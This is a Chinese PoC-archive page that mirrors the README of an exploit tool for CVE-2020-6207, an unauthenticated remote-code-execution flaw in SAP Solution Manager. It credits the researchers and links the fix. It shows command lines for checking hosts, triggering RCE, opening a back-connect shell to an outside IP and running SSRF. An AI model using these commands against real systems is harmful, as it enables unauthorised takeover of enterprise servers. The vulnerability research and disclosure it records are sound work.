支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: c161971ee131e0c86475d9fc79a41ac2bb11a14e

来源
https://github.com/chipik/SAP_EEM_CVE-2020-6207
关联漏洞
标题:SAP Solution Manager 访问控制错误漏洞 (CVE-2020-6207)
Description:SAP Solution Manager是德国思爱普(SAP)公司的一套集系统监控、SAP支持桌面、自助服务、ASAP实施等多个功能为一体的系统管理平台。该平台可以帮助客户建立SAP解决方案的生命周期管理,并提供系统监控、远程支持服务和SAP产品组件升级等功能。 SAP Solution Manager (User Experience Monitoring) 7.2版本中存在安全漏洞,该漏洞源于程序没有对服务进行任意的身份验证。攻击者可利用该漏洞入侵所有连接Solution Manager的SMDAge
Description
PoC for CVE-2020-6207  (Missing Authentication Check in SAP Solution Manager)
介绍
PoC for **CVE-2020-6207**  (Missing Authentication Check in SAP Solution Manager)  
This script allows to check and exploit missing authentication checks in SAP EEM servlet (`tc~smd~agent~application~eem`) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager  
Original finding: 
- [Pablo Artuso](https://twitter.com/lmkalg)
- [Yvan 'iggy' G](https://twitter.com/_1ggy) 

Paper: [An Unauthenticated Journey to Root :Pwning Your Company's Enterprise Software Servers](https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf)   
Solution: sap note [2890213](https://launchpad.support.sap.com/#/notes/2890213) 

Follow me in Twitter: [@_chipik_](https://twitter.com/_chipik) 

***This project is created only for educational purposes and cannot be used for law violation or personal gain.
<br>The author of this project is not responsible for any possible harm caused by the materials of this project***


# Details

You will find vulnerabilities details in [process](./Process.md) article

# How to use

Just point SAP Solution Manager hostnmae/ip.

## Check

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000
```

## Trigger RCE

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe
```

![gif](img/rce.gif) 

## Get BackConnect

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337
```

## SSRF 

```
➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk
```

## Other

There is additional options:
```
➜ python sol-rce.py -h

usage: sol-rce.py [-h] [-H HOST] [-P PORT] [-p PROXY] [-s] [-c] [-d VICTIM]
                  [--ssrf SSRF] [--rce RCE] [--back BACK] [--setup SETUP]
                  [--list] [--clear] [-t TIMEOUT] [-v]

PoC for CVE-2020-6207, (Missing Authentication Check in SAP Solution Manager)
This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager
Original finding:
- Pablo Artuso. https://twitter.com/lmkalg
- Yvan 'iggy' G https://twitter.com/_1ggy

Paper: https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf
Solution: https://launchpad.support.sap.com/#/notes/2890213

twitter: https://twitter.com/_chipik

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  SAP Solution Manager host(default: 127.0.0.1)
  -P PORT, --port PORT  SAP Solution Manager web port (default: tcp/50000)
  -p PROXY, --proxy PROXY
                        Use proxy (ex: 127.0.0.1:8080)
  -s, --ssl             enable SSL
  -c, --check           just detect vulnerability
  -d VICTIM, --victim VICTIM
                        DA serverName
  --ssrf SSRF           exploit SSRF. Point http address here. (example:http://1.1.1.1/chpk)
  --rce RCE             exploit RCE
  --back BACK           get backConnect from DA. (ex: 1.1.1.1:1337)
  --setup SETUP         setup a random serverName to the DA with the given hostName and instanceName. (example: javaup.mshome.net,SMDA97)
  --list                Get a list of existing DA servers
  --clear               stop and delete all PoCScript<rnd> scripts from DA servers
  -t TIMEOUT, --timeout TIMEOUT
                        HTTP connection timeout in second (default: 10)
  -v, --verbose         verbose mode
```
文件快照

 [4.0K]  /data/pocs/c161971ee131e0c86475d9fc79a41ac2bb11a14e
├── [1.0K]  detect.rules
├── [4.0K]  img
│   ├── [ 13K]  calc.png
│   ├── [ 66K]  dainstall.png
│   ├── [315K]  enabledEem.png
│   ├── [301K]  getAllAgentInfo.png
│   ├── [329K]  notenabled.png
│   ├── [9.7M]  rce.gif
│   ├── [ 83K]  resources1.png
│   ├── [ 41K]  ssrf.png
│   └── [499K]  wsdl.png
├── [ 16K]  Process.md
├── [3.5K]  README.md
└── [ 19K]  sol-rce.py

1 directory, 13 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。